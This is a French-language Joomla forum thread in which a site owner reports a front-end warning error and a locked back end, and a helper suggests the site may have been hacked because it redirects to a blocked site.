erreur warning en front end (et impossible d'entrer en back-end)

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] erreur warning en front end (et impossible d'entrer en back-end)

    Bonjour,
    Je possède un site vitrine www.pierbiau.com, pour lequel j'ai un message d'erreur qui vient d'apparaître (ce matin vers 7h00, tout était ok, tant en front qu'en back end).
    Je suis en J 3.10.11, toutes les extensions étaient à jour ce matin, tout comme le joomla.
    Qui aurait une idée pour régler ce problème ?
    Je peux, via ftp, aller chercher le dit fichier pour voir ce qui se passe en ligne 663, mais ensuite je ne saurais pas quoi en faire car je ne suis néophyte...
    Cordialement,
    P. BIAU

  • #2
    Bonjour,

    Je viens de cliquer sur ton lien, l'adresse a été redirigée vers un autre site que Bitdefender a bloqué.
    Il serait donc possible que le site ait été piraté. Commence par vérifier par ftp s'il n'y a rien d'inhabituel dans le dossier du site
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire


    • #3
      Bonjour,
      Merci pour la rapidité de réponse.
      J'ai vérifié via sftp dans le dossier www, mais rien d'anormal pour l'instant. Je suis allé télécharger le fichier incriminé par le message d'erreur, à savoir loader.php : voici une capture d'écran de la zone autour de la ligne 663, ou je n'ai pas l'impression d'y voir du code malveillant...

      Je remet juste le message d'erreur pour éviter à ce que les personnes qui lisent la discussion aient à cliquer sur le lien du site :